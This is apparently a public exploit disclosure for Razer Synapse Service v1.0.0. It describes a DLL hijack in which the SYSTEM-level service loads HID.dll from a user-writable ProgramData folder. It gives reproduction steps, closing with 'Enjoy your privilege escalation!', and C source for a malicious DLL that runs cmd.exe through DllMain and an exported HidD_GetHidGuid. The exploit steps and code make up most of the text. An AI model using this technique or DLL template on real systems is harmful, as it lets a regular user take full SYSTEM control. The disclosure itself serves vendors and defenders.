Discovered by: Juan Sacco Razer Synapse Service v1.0.0 is prone to a DLL Injection because it fails to properly filter user supplied input and loads a .DLL from %ProgramData% from userland with SYSTEM rights allowing to escalate the priveleges from a regular user to SYSTEM rights. Program: Raze Synapse Service Version: 1.0.0 Vendor: https://www.razer.com/ Download link: https://www.razer.com/downloads Steps To Reproduce: Move your .DLL to C:\ProgramData\Razer\Synapse3\Service\Bin\HID.dll Restart the PC or restart the service. The service runs with SYSTEM rights. Enjoy your privilege escalation! Supporting Material/References: ProgramData specifies the path to the program-data folder (normally C:\ProgramData). Unlike the Program Files folder, this folder can be used by applications to store data for standard users, because it does not require elevated permissions. Reference: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/ff716245(v=win.10)?redirectedfrom=MSDN#feedback Razer Synaprse Service.exe loads a DLL ( HID.dll ) from ProgramData\Razer\Synapse3\Service\ folder with the function: "HidD_GetHidGuid()" using the following code we can compile a DLL and export this function from it to being called during attach. // dllmain.cpp : Defines the entry point for the DLL application. include "pch.h" include "windows.h" BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { char cmd[] = "cmd.exe /c"; switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: WinExec(cmd, SW_SHOWNORMAL); ExitProcess(0); case DLL_THREAD_ATTACH: WinExec(cmd, SW_SHOWNORMAL); ExitProcess(0); case DLL_THREAD_DETACH: WinExec(cmd, SW_SHOWNORMAL); ExitProcess(0); case DLL_PROCESS_DETACH: WinExec(cmd, SW_SHOWNORMAL); ExitProcess(0); break; } return TRUE; } extern "C" __declspec(dllexport) void HidD_GetHidGuid() { char cmd[] = "cmd.exe /c"; WinExec(cmd, SW_SHOWNORMAL); } Impact A regular user could abuse of this vulnerability to gain full SYSTEM rights.